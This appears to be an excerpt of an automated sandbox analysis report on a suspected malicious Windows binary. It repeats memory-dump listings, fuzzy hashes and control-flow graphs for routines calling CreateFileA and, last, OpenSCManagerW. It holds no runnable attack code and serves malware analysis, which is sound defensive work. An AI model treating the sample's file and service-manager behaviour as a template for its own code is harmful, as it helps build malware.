                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: f8e24161bbb8714b51827592af4b31e09544ab0c70fea24f5771d87adec3accf
                                                                                    • Instruction ID: b61a8c450a7f39df4cfd343a982eef751a78988110edc5ab9cb1048c042e4468
                                                                                    • Opcode Fuzzy Hash: f8e24161bbb8714b51827592af4b31e09544ab0c70fea24f5771d87adec3accf
                                                                                    • Instruction Fuzzy Hash: 283100B710C3856EF30A9AA46D10EFB7B6EDBD2730731825BF442C7092D3514D0A9AB1
                                                                                    Function 0118BFB7 Relevance: 1.6, APIs: 1, Instructions: 108fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 104 118bfb7-118c032 110 118c038 104->110 111 118c03e-118c063 CreateFileA 104->111 110->111 113 118c069-118c074 111->113 114 118c453-118c46f 111->114 115 118c07a 113->115 116 118c082-118c0ac call 118c09c 113->116 115->116 117 118c080-118c081 115->117 122 118c0b8-118c0cc 116->122 123 118c0b2-118c0b7 116->123 117->116 126 118c0d8-118c0f3 122->126 127 118c0d2-118c0d7 122->127 123->122 129 118c0f9-118c0fe 126->129 130 118c0ff-118c121 call 118c125 126->130 127->126 129->130 134 118c124 130->134 134->134
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(0000002B,A82BFED8,00000003), ref: 0118C05A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653742528.00000000011F5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653760213.00000000011FD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653778616.0000000001205000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653795341.0000000001206000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653811810.0000000001207000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653829744.000000000120D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653847422.000000000120E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653864799.0000000001211000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653882974.0000000001219000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653903156.000000000121D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653922680.000000000122A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653939171.0000000001230000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653954090.0000000001231000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653973799.0000000001235000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653991338.000000000123D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654007031.000000000123F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654025770.000000000124E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654042580.0000000001250000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654064316.000000000126D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654081875.000000000126F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654105312.000000000128F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 6205a7d3166e6442f4d19463b5dd04ba6ab5cfad6895ea336542770181fd31ec
                                                                                    • Instruction ID: 64b696ebb4af8e9f8c5b7afba11f0b9e4c0a0d0cda4140abf2195829c8863f11
                                                                                    • Opcode Fuzzy Hash: 6205a7d3166e6442f4d19463b5dd04ba6ab5cfad6895ea336542770181fd31ec
                                                                                    • Instruction Fuzzy Hash: 3C214DBB04C3056ED309AE694941BFBBBADEB432B0F21C119F041C6942D7A2094A9E71
                                                                                    Function 0118BFE9 Relevance: 1.6, APIs: 1, Instructions: 99fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 135 118bfe9-118c032 139 118c038 135->139 140 118c03e-118c063 CreateFileA 135->140 139->140 142 118c069-118c074 140->142 143 118c453-118c46f 140->143 144 118c07a 142->144 145 118c082-118c0ac call 118c09c 142->145 144->145 146 118c080-118c081 144->146 151 118c0b8-118c0cc 145->151 152 118c0b2-118c0b7 145->152 146->145 155 118c0d8-118c0f3 151->155 156 118c0d2-118c0d7 151->156 152->151 158 118c0f9-118c0fe 155->158 159 118c0ff-118c121 call 118c125 155->159 156->155 158->159 163 118c124 159->163 163->163
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(0000002B,A82BFED8,00000003), ref: 0118C05A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653742528.00000000011F5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653760213.00000000011FD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653778616.0000000001205000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653795341.0000000001206000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653811810.0000000001207000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653829744.000000000120D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653847422.000000000120E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653864799.0000000001211000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653882974.0000000001219000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653903156.000000000121D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653922680.000000000122A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653939171.0000000001230000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653954090.0000000001231000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653973799.0000000001235000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653991338.000000000123D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654007031.000000000123F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654025770.000000000124E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654042580.0000000001250000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654064316.000000000126D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654081875.000000000126F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654105312.000000000128F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 47cdb455cb6417b1b5012f72ee76b983f7977e8a2fd93c37d2abcdee5100f372
                                                                                    • Instruction ID: 27953a9ad31f35679b8aa5ab24933d7a0ce9725212daa10fc93ff5ec17f446d5
                                                                                    • Opcode Fuzzy Hash: 47cdb455cb6417b1b5012f72ee76b983f7977e8a2fd93c37d2abcdee5100f372
                                                                                    • Instruction Fuzzy Hash: 1821FCBB14C2455ED319AE6959507FBBBADEB43370F20C019F041C7943D3A10D469AB1
                                                                                    Function 0118C002 Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 164 118c002-118c032 166 118c038 164->166 167 118c03e-118c063 CreateFileA 164->167 166->167 169 118c069-118c074 167->169 170 118c453-118c46f 167->170 171 118c07a 169->171 172 118c082-118c0ac call 118c09c 169->172 171->172 173 118c080-118c081 171->173 178 118c0b8-118c0cc 172->178 179 118c0b2-118c0b7 172->179 173->172 182 118c0d8-118c0f3 178->182 183 118c0d2-118c0d7 178->183 179->178 185 118c0f9-118c0fe 182->185 186 118c0ff-118c121 call 118c125 182->186 183->182 185->186 190 118c124 186->190 190->190
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(0000002B,A82BFED8,00000003), ref: 0118C05A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653742528.00000000011F5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653760213.00000000011FD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653778616.0000000001205000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653795341.0000000001206000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653811810.0000000001207000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653829744.000000000120D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653847422.000000000120E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653864799.0000000001211000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653882974.0000000001219000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653903156.000000000121D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653922680.000000000122A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653939171.0000000001230000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653954090.0000000001231000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653973799.0000000001235000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653991338.000000000123D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654007031.000000000123F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654025770.000000000124E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654042580.0000000001250000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654064316.000000000126D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654081875.000000000126F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654105312.000000000128F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 249098f80b1993276151a3f7ff9dbb3d773d8bf79e81c4444f58ad5da4805d64
                                                                                    • Instruction ID: 423ba4de1ed14a11ec21e1efa0133de1b45a036807b3f7474d931835b7ab904a
                                                                                    • Opcode Fuzzy Hash: 249098f80b1993276151a3f7ff9dbb3d773d8bf79e81c4444f58ad5da4805d64
                                                                                    • Instruction Fuzzy Hash: E521FBBB1482459EE309EE6899517FBBBA9EB43270F21C119F041C7942D772094A9F71
                                                                                    Function 0118C028 Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 191 118c028-118c063 CreateFileA 193 118c069-118c074 191->193 194 118c453-118c46f 191->194 195 118c07a 193->195 196 118c082-118c0ac call 118c09c 193->196 195->196 197 118c080-118c081 195->197 202 118c0b8-118c0cc 196->202 203 118c0b2-118c0b7 196->203 197->196 206 118c0d8-118c0f3 202->206 207 118c0d2-118c0d7 202->207 203->202 209 118c0f9-118c0fe 206->209 210 118c0ff-118c121 call 118c125 206->210 207->206 209->210 214 118c124 210->214 214->214
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(0000002B,A82BFED8,00000003), ref: 0118C05A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.1653522526.0000000001186000.00000040.00000001.01000000.00000006.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.1653260775.0000000001000000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653304149.0000000001006000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653321615.000000000100A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653341729.0000000001014000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653360423.0000000001015000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653378596.0000000001016000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653484088.0000000001174000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653502149.0000000001176000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653522526.0000000001193000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653564056.00000000011AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653580823.00000000011AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653597564.00000000011B1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653614562.00000000011B3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653633462.00000000011BF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653649910.00000000011C0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653667239.00000000011C6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653706465.00000000011E1000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653723587.00000000011E6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653742528.00000000011F5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653760213.00000000011FD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653778616.0000000001205000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653795341.0000000001206000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653811810.0000000001207000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653829744.000000000120D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653847422.000000000120E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653864799.0000000001211000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653882974.0000000001219000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653903156.000000000121D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653922680.000000000122A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653939171.0000000001230000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653954090.0000000001231000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653973799.0000000001235000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1653991338.000000000123D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654007031.000000000123F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654025770.000000000124E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654042580.0000000001250000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654064316.000000000126D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654081875.000000000126F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654105312.000000000128F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654120760.0000000001290000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.0000000001299000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654137220.00000000012A2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.1654172991.00000000012B0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_1000000_AU963ROPSBOYUMXP3FF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 8d7a0794350222d0dadf755b1d5b4e5b0a60435bef2b660dc695fd67f9cfb447
                                                                                    • Instruction ID: 8dd2e1f38d7780237a2d1b90eb5885efc60b4524e6788efbad0e099f46bb2845
                                                                                    • Opcode Fuzzy Hash: 8d7a0794350222d0dadf755b1d5b4e5b0a60435bef2b660dc695fd67f9cfb447
                                                                                    • Instruction Fuzzy Hash: 842108BB00C3815EE31AEA7999507F6BFA8DB43230F25C45EE081C7943C765494ADB71
                                                                                    Function 059D0D41 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 215 59d0d41-59d0d44 216 59d0da5-59d0da8 215->216 217 59d0d46-59d0d97 215->217 219 59d0dab-59d0dda OpenSCManagerW 216->219 222 59d0d9f-59d0da3 217->222 223 59d0d99-59d0d9c 217->223 220 59d0ddc-59d0de2 219->220 221 59d0de3-59d0df7 219->221 220->221 222->216 222->219 223->222
